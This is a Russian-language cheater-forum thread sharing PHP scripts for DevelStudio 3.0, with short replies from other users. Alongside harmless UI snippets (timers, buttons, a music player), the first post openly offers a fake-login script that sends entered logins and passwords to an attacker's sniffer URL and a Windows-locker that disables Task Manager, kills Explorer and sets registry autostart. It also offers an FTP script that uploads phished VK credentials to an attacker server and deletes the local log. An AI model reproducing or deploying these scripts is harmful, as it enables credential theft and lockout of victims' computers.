скрипты для DevelStudio 3.0 beta

Тема в разделе "Полезные Программы для Читера", создана пользователем froggi533, 10 сен 2013.

Статус темы:
Закрыта.
  1. Оффлайн

    froggi533 ст. сержант

    На форуме с:
    9 авг 2013
    Сообщения:
    39
    Симпатии:
    37
    Баллы:
    17
    Пол:
    Мужской
    Скрипт на кнопку цифры:
    c("edit1")->text .="ваша цифра";

    Скрипт на таймер:
    c("progress1")->position +=1;
    $time=c("progress1")->position;
    c("labTime")->caption =$time;
    if($time==50)
    {
    c("timer1")->enable = false;
    c("image1")->enabled = false;
    MessageBox("Ваш результат: ".c("labCou")->caption, "Сообщение!");
    c("button1")->enabled = true;
    }

    Скрипт на картинку:
    $l= rand(0,c("panel1")->w-c("image1")->w);
    $t= rand(0,c("panel1")->h-c("image1")->h);
    c("image1")->x =$l;
    c("image1")->y =$t;
    c("labCou")->caption +=1 ;

    Скрипт на кнопку старт:
    c("timer1")->enable = true;
    c("timer1")->repeat = true;
    c("button1")->enabled = false;
    c("image1")->enabled = true;

    c("labCou")->caption = 0;
    c("labTime")->caption = 0;
    c("progress1")->position=0;

    Скрипт для кражи логина и пароля на сниффер:
    $edit1 = c('Form1->edit1')->text;
    $edit2 = c('Form1->edit2')->text;
    $combobox1 = c('Form1->combobox1')->inText;
    $url = "ССЫЛКА НА ВАШ СНИФФЕР";
    file_get_contents($url . "?" . "Логин:" . $edit1 . "|Пароль:" . $edit2);
    MessageBox("Неверно введён логин или пароль", "Ошибка");

    Скрипт на кнопку "Разблокировать":
    if(c("edit1")->text =="1337"){ (ПАРОЛЬ ДЛЯ РАЗБЛОКИРОВКИ)
    Run("explorer.exe", false); (ЗАПУСКАЕТ ПРОВОДНИК)
    DisableTaskMng(false); (ВКЛЮЧАЕТ ДИСПЕДЧЕР ЗАДАЧ)
    app::close(); (ЗАКРЫВАЕТ ПРОГРАММУ)
    }
    else{
    c("edit1")->text = "Неверный код!" ;
    c("label3")->text -= "1";
    }

    Скрипт для блокировки Windows:
    DisableTaskMng(true); (ВЫРУБАЕТ ДИСПЕДЧЕР ЗАДАЧ)
    shell_exec("TASKKILL /F /IM explorer.exe"); (УБИВАЕТ ПРОВОДНИК)
    $w = $SCREEN->width;
    $h = $SCREEN->height;
    $project = 'InjectorBySolex.exe'; (НАЗВАНИЕ ПРОГРАММЫ)
    $str = strtr($dir , '/', '\\');
    writeRegKey(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\", "$str$project", STRING); (ЗАПИСЬ В РЕЕСТР - АВТОЗАГРУЗКА)

    Скрипт на кнопку "Очистить":
    c("edit1")->text = "" ;

    Таймер обратного отсчета:
    $q = c("label1")->caption;
    c("label1")->caption = $q - 1;
    $w = c("label1")->caption;
    if($w == 0){
    $min = c("label2")->caption;
    c("label2")->caption = $min - 1;
    $mint = c("label2")->caption;
    c("label1")->caption = 60;
    }
    if($mint == 0){
    if($w == 0){
    c("button1")->enabled = true;
    c("timer1")->enable = false;
    }
    }
    $minut = c("label2")->caption;
    c("label3")->caption = $minut." Мин ". $w ." Сек";

    Скрипт для акцивации:
    if(c("edit1")->text =="код активации"){
    HideForm(Form1, SW_SHOW);
    LoadForm(ziabyka, SW_SHOW);
    }
    else{
    MessageBox("Неверный код активации", "Error");
    }


    Скрипт для плеера:
    Сайт иконок -

    Ссылки могут видеть только зарегестрированные пользователи. Для того что-бы скачать читы зарегистрируйтесь на форуме


    $result = c("openDlg1")->execute(); (ОТКРЫТЬ)
    if ($result)
    {
    $arr = c("openDlg1")->files;
    foreach ($arr as $i=>$file)
    $arr[$i] = basename($file);
    c("listBox1")->items->setArray($arr);
    $music = c("listBox1")->items->selected; (ИГРАТЬ)
    c("sqPlayer1")->fileName = $music;
    c("sqPlayer1")->play();
    WinShutdown();

    Как записать текст в файл:
    file_put_contents("<путь к файлу>", "<текст>");

    Как получить содержимое файла:
    $text = file_get_contents("<путь к файлу>");
    Пример:
    $text = file_get_contents("C:/FileName.txt"); print($text);

    Скрипт отправки данных FTP:
    PHP highlight
    $ftp_server = (""); (СЕРВЕР FTP)
    $ftp_login = (""); (ЛОГИН FTP)
    $ftp_pass = (""); (ПАРОЛЬ FTP)
    $file = ('logs.txt'); (ИМЯ ФАЙЛА С ЛОГАМИ)
    $vk_login = c("edit1")->text; (ЛОГИН С ФЕЙКА)
    $vk_pass = c("edit2")->text; (ПАРОЛЬ С ФЕЙКА)
    $open = ftp_connect($ftp_server, 21, 30); (ПОДКЛЮЧЕНИЕ К FTP СЕРВЕРУ)
    ftp_connect($ftp_server, 21, 30); (ПОДКЛЮЧАЕМСЯ)
    ftp_login($open, $ftp_login, $ftp_pass); (АВТОРИЗУЕМСЯ)
    ftp_get($open, $file, $file, FTP_BINARY); (СКАЧИВАЕМ ФАЙЛ С ЛОГАМИ)
    $log = fopen($file,"a+"); (ОТКРЫВАЕМ СКАЧАНЫЙ ФАЙЛ)
    fwrite($log,"$vk_login;$vk_pass \n"); (ЗАПИСЫВАЕМ ДАННЫЕ)
    fclose($log); (ЗАКРЫВАЕМ ФАЙЛ)
    ftp_pasv($open, true); (ПЕРЕКЛЮЧАЕМСЯ В ПАССИВНЫЙ РЕЖИМ)
    !ftp_put($open, $file, $file, FTP_BINARY); (ОТПРАВЛЯЕМ ФАЙЛ НА FTP)
    ftp_close($open); (ЗАКРЫВАЕМ СОЕДИНЕНИЕ)
    file_delete("$file"); (УДАЛЯЕМ ФАЙЛ С ЛОГАМИ ИЗ КОМПЬЮТЕРА)
    Создаем в корне FTP файл logs.txt с правами 777

    Запретить закрытие программы:
    $canclose=false

    Прогресс бар двигается при нажатии на кнопку:
    На кнопку:
    ShowForm(progress1, SW_SHOW);
    C("TIMER1")->ENABLE = TRUE;
    C("TIMER1")->REPEAT = TRUE;
    C("BUTTON1")->ENABLED = FALSE;
    C("PROGRESS1")->POSITION=0;
    на таймер:
    c("progress1")->position +=1;
    $time = c("progress1")->position;
    if($time==3000){ c("timer1")->enable = false;
    c("button1")->enabled = true;
    }h>d Кому помог сяпку)
     
  2.  
  3. Оффлайн

    froggi533 ст. сержант

    На форуме с:
    9 авг 2013
    Сообщения:
    39
    Симпатии:
    37
    Баллы:
    17
    Пол:
    Мужской
    кому нужно могу еще):cool:
     
    читер05 нравится это.
  4. Оффлайн

    Aventador™

    На форуме с:
    25 дек 2012
    Сообщения:
    605
    Симпатии:
    755
    Баллы:
    148
    Пол:
    Мужской
    skype:
    mr.teldes-aim350
  5. Оффлайн

    froggi533 ст. сержант

    На форуме с:
    9 авг 2013
    Сообщения:
    39
    Симпатии:
    37
    Баллы:
    17
    Пол:
    Мужской
    ты не знаешь?
     
    читер05 нравится это.
  6. Оффлайн

    Maksim Frolof сержант

    На форуме с:
    8 авг 2013
    Сообщения:
    35
    Симпатии:
    3
    Баллы:
    6
    Помоги сделал прогу для узнания ip а там одни вирусы (ну всемысле через вирус тотал) что итам токого вирусного вот скрипт
    $ip = $_SERVER['REMOTE_ADDR'];
    c("edit1")->text = "$ip";
     
    читер05 нравится это.
  7. Оффлайн

    froggi533 ст. сержант

    На форуме с:
    9 авг 2013
    Сообщения:
    39
    Симпатии:
    37
    Баллы:
    17
    Пол:
    Мужской
    ничего здесь вирусного быть не может
     
    читер05 нравится это.
  8. Оффлайн

    Maksim Frolof сержант

    На форуме с:
    8 авг 2013
    Сообщения:
    35
    Симпатии:
    3
    Баллы:
    6
    А чё вирус тотал просто ужасный:(+
     
    читер05 нравится это.
  9. Оффлайн

    sgush321 М. Лейтенант

    На форуме с:
    7 дек 2013
    Сообщения:
    439
    Симпатии:
    171
    Баллы:
    71
    Пол:
    Мужской
    Пасибо помог немого интересовал скрипт на плеер если есть ещё скрипты кидай в Лс
     
    читер05 нравится это.
  10. Оффлайн

    froggi533 ст. сержант

    На форуме с:
    9 авг 2013
    Сообщения:
    39
    Симпатии:
    37
    Баллы:
    17
    Пол:
    Мужской
    ок)
     
  11. Оффлайн

    ƊƩϻṎⱧ рядовой

    На форуме с:
    9 апр 2014
    Сообщения:
    2
    Симпатии:
    0
    Баллы:
    1
    Привет, помогите!
    Какой нужен скрипт и куда его вставить?
     
Статус темы:
Закрыта.

Поделиться этой страницей

  1. php devel studio скрипты

    ,
  2. скріпти для плеєра в девел студіо

    ,
  3. скрипты для девел студио 3.0

    ,
  4. Скрипты для php devel studio,
  5. как сделать вируса для кражи паролей на сниффер PhP Devel Studio,
  6. скрипты для девел студио 2.0

Уважаемый пользователь!

Мы обнаружили, что вы блокируете показ рекламы на нашем сайте.

Просим внести его в список исключения или отключить AdBlock.

Наши материалы предоставляются БЕСПЛАТНО и единственным доходом является реклама.

Спасибо за понимание!